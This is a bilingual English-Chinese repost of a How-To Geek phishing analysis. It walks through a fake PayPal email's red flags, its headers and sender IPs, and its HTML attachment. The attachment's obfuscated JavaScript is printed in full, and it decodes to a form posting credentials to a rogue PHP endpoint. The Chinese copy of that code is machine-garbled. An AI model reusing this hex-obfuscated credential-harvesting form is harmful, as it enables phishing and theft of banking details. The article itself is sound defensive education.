In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.
在当今每个人的信息都在线的世界中,网络钓鱼是最流行和破坏性最大的在线攻击之一,因为您始终可以清除病毒,但是如果您的银行详细信息被盗,则将有麻烦。 这是我们收到的此类攻击的细分。
Don’t think that it’s just your banking details that are important: after all, if someone gains control over your account login they not only know the information contained in that account, but the odds are that same login information may be used on various other accounts. And if they compromise your email account, they can reset all your other passwords.
不要以为您的银行详细信息才是重要的:毕竟,如果有人控制了您的帐户登录,他们不仅知道该帐户中包含的信息,而且很可能在其他各种帐户上使用相同的登录信息帐户。 而且,如果他们破坏了您的电子邮件帐户,他们可以重设所有其他密码。
So in addition to keeping strong and varying passwords, you have to always be on the lookout for bogus emails masquerading as the real thing. While most phishing attempts are amateurish, some are quite convincing so it is important to understand how to recognize them at surface level as well as how they work under the hood.
因此,除了保留强大且变化的密码外,您还必须时刻注意伪装成真实邮件的虚假电子邮件。 尽管大多数网络钓鱼尝试都是业余活动,但有些却令人信服,因此,重要的是要了解如何在表面上识别它们以及它们在引擎盖下的工作方式。
Image by asirap
图片由asirap
检查什么是普通视域 (Examining What is in Plain Sight)
Our example email, like most phishing attempts, “notifies” you of activity on your PayPal account which would, under normal circumstances, be alarming. So the call to action is to verify/restore your account by submitting just about every piece of personal information you can think of. Again, this is pretty formulaic.
与大多数网络钓鱼尝试一样,我们的示例电子邮件会“通知”您在PayPal帐户上的活动,在正常情况下,这会令人震惊。 因此,号召采取行动是通过提交您能想到的几乎每条个人信息来验证/恢复您的帐户。 同样,这是很公式化的。
While there certainly are exceptions, pretty much every phishing and scam email is loaded with red flags directly in the message themselves. Even if the text is convincing, you can usually find many mistakes littered throughout the message body which indicate the message is not legit.
当然也有例外,但几乎每个网络钓鱼和诈骗电子邮件都直接在邮件本身中加载了红色标记。 即使文本令人信服,您通常也可以在整个消息正文中发现许多错误,这些错误表明消息不合法。
The Message Body
消息正文
At first glance, this is one of the better phishing emails I have seen. There are no spelling or grammatical mistakes and the verbiage reads according to what you might expect. However, there are a few red flags you can see when you examine the content a bit more closely.
乍一看,这是我所见过的更好的网络钓鱼电子邮件之一。 没有拼写或语法错误,并且根据您的期望阅读该杂语。 但是,当您仔细检查内容时,会看到一些危险信号。
- “Paypal” – The correct case is “PayPal” (capital P). You can see both variations are used in the message. Companies are very deliberate with their branding, so it is doubtful something like this would pass the proofing process. “ Paypal” –正确的情况是“ PayPal”(大写P)。 您可以看到消息中使用了两种变体。 公司非常谨慎地进行品牌宣传,因此,像这样的事情会通过打样过程令人怀疑。
- “allow ActiveX” – How many times have you seen a legit web based business the size of Paypal use a proprietary component which only works on a single browser, especially when they support multiple browsers? Sure, somewhere out there some company does it, but this is a red flag. “允许ActiveX” –您有多少次看到像Paypal这样规模的合法网络业务使用专有组件,该组件仅在单个浏览器上有效,特别是当它们支持多个浏览器时? 当然,外面有一家公司这样做,但这是一个危险信号。
- “securely.” – Notice how this word does not line up in the margin with the rest of the paragraph text. Even if I stretch the window a bit more, it doesn’t wrap or space correctly. “很安全。” –请注意,该单词如何与段落文本的其余部分不对齐。 即使我拉伸窗口多一点,它也不能正确包裹或间隔。
- “Paypal !” – The space before the exclamation mark looks awkward. Just another quirk which I am sure would not be in a legit email. “贝宝!” –感叹号前的空间看起来很尴尬。 我敢肯定,这只是另一个怪癖,不会出现在合法电子邮件中。
- “PayPal- Account Update Form.pdf.htm” – Why would Paypal attach a “PDF” especially when they could just link to a page on their site? Additionally, why would they try to disguise an HTML file as a PDF? This is the biggest red flag of them all. “ PayPal-帐户更新表格.pdf.htm” –为什么Paypal会附加“ PDF”,尤其是当他们只能链接到其网站上的页面时? 此外,为什么他们会尝试将HTML文件伪装成PDF? 这是所有人中最大的危险信号。
The Message Header
邮件标题
When you take a look at the message header, a couple of more red flags appear:
当您查看消息标题时,会出现几个其他的红色标记:
The from address is test@test.com.
发件人地址为test@test.com 。
- The to address is missing. I did not blank this out, it simply isn’t part of the standard message header. Typically a company which has your name will personalize the email to you. 收件人地址丢失。 我没有将其清除掉,它根本不是标准消息头的一部分。 通常,使用您名字的公司会将您的电子邮件个性化。
The Attachment
附件
When I open the attachment, you can immediately see the layout is not correct as it is missing style information. Again, why would PayPal email an HTML form when they could simply give you a link on their site?
当我打开附件时,您会立即看到布局不正确,因为它缺少样式信息。 同样,当PayPal只需在您的网站上给您一个链接时,为什么还要通过电子邮件发送HTML表单?
Note: we used Gmail’s built-in HTML attachment viewer for this, but we’d recommend that you DO NOT OPEN attachments from scammers. Never. Ever. They very often contain exploits that will install trojans on your PC to steal your account info.
注意:为此,我们使用了Gmail的内置HTML附件查看器,但是我们建议您不要打开诈骗者的附件。 决不。 曾经它们通常包含一些漏洞,这些漏洞会在您的PC上安装木马来窃取您的帐户信息。
Scrolling down a bit more you can see that this form asks not only for our PayPal login information, but for banking and credit card information as well. Some of the images are broken.
向下滚动一点,您会看到此表格不仅要求我们的PayPal登录信息,而且要求提供银行和信用卡信息。 一些图像坏了。
It is obvious this phishing attempt is going after everything with one swoop.
很明显,这种网络钓鱼企图一口气追随一切。
技术故障 (The Technical Breakdown)
While it should be pretty clear based on what is in plain sight that this is a phishing attempt, we are now going to break down the technical makeup of the email and see what we can find.
根据明显的目光,这很明显是网络钓鱼,但我们现在将分解电子邮件的技术组成,看看可以找到什么。
Information from the Attachment
附件中的信息
The first thing to take a look at is the HTML source of the attachment form which is what submits the data to the bogus site.
首先要看的是附件表单HTML源,该源将数据提交到虚假站点。
When quickly viewing the source, all the links appear valid as they point to either “paypal.com” or “paypalobjects.com” which are both legit.
快速查看源代码时,所有链接都指向合法的“ paypal.com”或“ paypalobjects.com”,因此显示为有效链接。
Now we are going to take a look at some basic page information Firefox gathers on the page.
现在,我们将看一下Firefox在页面上收集的一些基本页面信息。
As you can see, some of the graphics are pulled from the domains “blessedtobe.com”, “goodhealthpharmacy.com” and “pic-upload.de” instead of the legit PayPal domains.
如您所见,某些图形是从“ blessedtobe.com”,“ goodhealthpharmacy.com”和“ pic-upload.de”域中提取的,而不是从合法的PayPal域中提取的。
Information from the Email Headers
电子邮件标题中的信息
Next we will take a look at the raw email message headers. Gmail makes this available via the Show Original menu option on the message.
接下来,我们将看一下原始电子邮件标题。 Gmail通过邮件上的“显示原始”菜单选项使此功能可用。
Looking at the header information for the original message, you can see this message was composed using Outlook Express 6. I doubt PayPal has someone on staff which sends each of these messages manually via an outdated email client.
查看原始消息的标题信息,您可以看到此消息是使用Outlook Express 6编写的。我怀疑PayPal的工作人员会通过过时的电子邮件客户端手动发送每条消息。
Now looking at the routing information, we can see the IP address of both the sender and the relaying mail server.
现在查看路由信息,我们可以看到发送者和中继邮件服务器的IP地址。
The “User” IP address is original sender. Doing a quick lookup on the IP information, we can see the sending IP is in Germany.
“用户” IP地址是原始发件人。 快速查看IP信息,我们可以看到发送IP在德国。
And when we look at the relaying mail server’s (mail.itak.at), IP address we can see this is an ISP based in Austria. I doubt PayPal routes their emails directly through an Austria based ISP when they have a massive server farm which could easily handle this task.
当我们查看中继邮件服务器(mail.itak.at)的IP地址时,我们可以看到这是基于奥地利的ISP。 我怀疑当PayPal有庞大的服务器场可以轻松处理此任务时,它们会直接通过基于奥地利的ISP路由其电子邮件。
Where Does the Data Go?
数据流向何处?
So we have clearly determined this is a phishing email and gathered some information about where the message originated from, but what about where your data is sent?
因此,我们已经清楚地确定这是一封网络钓鱼电子邮件,并收集了一些有关邮件起源的信息,但是您的数据发送到何处呢?
To see this, we have to first save the HTM attachment do our desktop and open in a text editor. Scrolling through it, everything appears to be in order except when we get to a suspicious looking Javascript block.
要看到这一点,我们必须先将HTM附件保存在桌面上,然后在文本编辑器中打开。 滚动浏览它,似乎一切都井井有条,除非我们进入一个看起来可疑的Javascript块。
Breaking out the full source of the last block of Javascript, we see:
深入了解Javascript的最后一块的完整源代码,我们看到:
<script language=”JavaScript” type=”text/javascript”>
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i,y,x=”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”;y=”;for(i=0;i<x.length;i+=2){y+=unescape(‘%’+x.substr(i,2));}document.write(y);
</script><脚本语言=“ JavaScript”类型=“文本/ javascript”>
//版权所有©2005 Voormedia – WWW.VOORMEDIA.COM
变种I,Y,X =” 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; Y =”;对于(i = 0;我<x.length; I + = 2){Y + = UNESCAPE( '%' + x.substr(I,2)); } document.write(y);
</ script>
Anytime you see a large jumbled string of seemingly random letters and numbers embedded in a Javascript block, it is usually something suspicious. Looking at the code, the variable “x” is set to this large string and then decoded into the variable “y”. The final result of variable “y” is then written to the document as HTML.
每当您看到在Javascript块中嵌入看似乱七八糟的看似随机字母和数字的字符串时,通常都是可疑的。 查看代码,将变量“ x”设置为该大字符串,然后将其解码为变量“ y”。 然后将变量“ y”的最终结果作为HTML写入文档。
Since the large string is made of numbers 0-9 and the letters a-f, it is most likely encoded via a simple ASCII to Hex conversion:
由于大字符串由数字0-9和字母af组成,因此很可能是通过简单的ASCII到十六进制转换来编码的:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374374f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Translates to:
转换为:
<form name=”main” id=”main” method=”post” action=”http://www.dexposure.net/bbs/data/verify.php”>
<form name =“ main” id =“ main” method =“ post” action =“ http://www.dexposure.net/bbs/data/verify.php”>
It is not a coincidence that this decodes into a valid HTML form tag which sends the results not to PayPal, but to a rogue site.
将其解码为有效HTML表单标签并非偶然,该标签不会将结果发送给PayPal,而是发送给恶意网站。
Additionally, when you view the HTML source of the form, you will see that this form tag is not visible because it is generated dynamically via the Javascript. This is a clever way to hide what the HTML is actually doing if someone were to simply view the generated source of the attachment (as we did earlier) as opposed to the opening the attachment directly in a text editor.
此外,当您查看表单HTML源代码时,您将看到此表单标记不可见,因为它是通过Javascript动态生成的。 如果有人只是简单地查看附件的生成源(就像我们之前所做的那样),而不是直接在文本编辑器中打开附件,这是一种隐藏HTML实际操作的聪明方法。
Running a quick whois on the offending site, we can see this is a domain hosted at a popular web host, 1and1.
在有问题的网站上运行快速的Whois,我们可以看到这是一个由受欢迎的Web主机1and1托管的域。
What stands out is the domain uses a readable name (as opposed to something like “dfh3sjhskjhw.net”) and the domain has been registered for 4 years. Because of this, I believe this domain was hijacked and used as a pawn in this phishing attempt.
最引人注目的是该域名使用了易读的名称(而不是类似“ dfh3sjhskjhw.net”之类的名称),并且该域名已经注册了4年。 因此,我相信此域名已被劫持并用作网络钓鱼尝试中的典当。
犬儒主义是很好的防御 (Cynicism is a Good Defense)
When it comes to staying safe online, it never hurts to have a good bit of cynicism.
当要确保上网安全时,保持一点冷嘲热讽的态度永远不会有任何伤害。
While I am sure there are more red flags in the example email, what we have pointed out above are indicators we saw after just a few minutes of examination. Hypothetically, if the surface level of the email mimicked its legitimate counterpart 100%, the technical analysis would still reveal its true nature. This is why is it import to be able to examine both what you can and cannot see.
尽管我确信示例电子邮件中还会有更多的危险信号,但我们上面指出的是经过几分钟的检查后所看到的指标。 假设,如果电子邮件的表面级别模仿其合法对应对象的100%,则技术分析仍将揭示其真实性质。 这就是为什么能够同时检查您可以看到和看不到的东西的原因。
翻译自: https://www.howtogeek.com/58642/online-security-breaking-down-the-anatomy-of-a-phishing-email/
扫一扫
3210
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
